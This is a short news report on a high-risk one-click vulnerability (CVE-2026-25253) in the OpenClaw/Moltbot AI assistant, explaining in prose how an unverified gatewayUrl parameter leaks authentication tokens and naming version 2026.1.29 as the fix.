AI Bot: OpenClaw (Moltbot) with high-risk code smuggling vulnerability

The subservient AI bot OpenClaw, also known as Moltbot or formerly ClawdBot, contains a serious security vulnerability. Attackers can thus intercept authentication tokens and ultimately execute arbitrary code on a victim's gateway.

In the vulnerability description, developer Peter Steinberger explains that the control user interface trusts the gatewayUrl parameter of a request without verification and automatically connects there when loading. It transmits the access token to the gateway in the WebSocket connection data. This allows a click on a prepared link or a visit to a malicious website to transfer the token to attacker-controlled servers, which can then log in to the gateway. There, they can change the configuration, for example regarding sandbox and tool policies, and execute actions with higher privileges (CVE-2026-25253, CVSS 8.8, risk “high”).

This is therefore a 1-click code smuggling vulnerability. Since the victim's web browser serves as a bridge, attackers can exploit the vulnerability even if the gateway is only connected to the loopback interface. Versions of OpenClaw/Moltbot up to and including 2026.1.28 are affected. Version 2026.1.29 closes the security hole. Anyone who has installed the AI bot should therefore update to the corrected version as soon as possible.

Moltbot: Powerful AI Bot

The AI assistant, originally named “Clawdbot” and then renamed “Moltbot” due to the similarity to Anthropic's AI Claude, has triggered an extreme hype. On GitHub alone, it has now garnered almost 150,000 stars at the time of reporting – a significant increase again since last week. The AI assistant is very powerful and can perform many actions, including with high privileges directly on the system where it is installed. c't 3003 took a closer look at the AI bot in its latest issue and spoke with its Viennese developer, Peter Steinberger.

(dmk)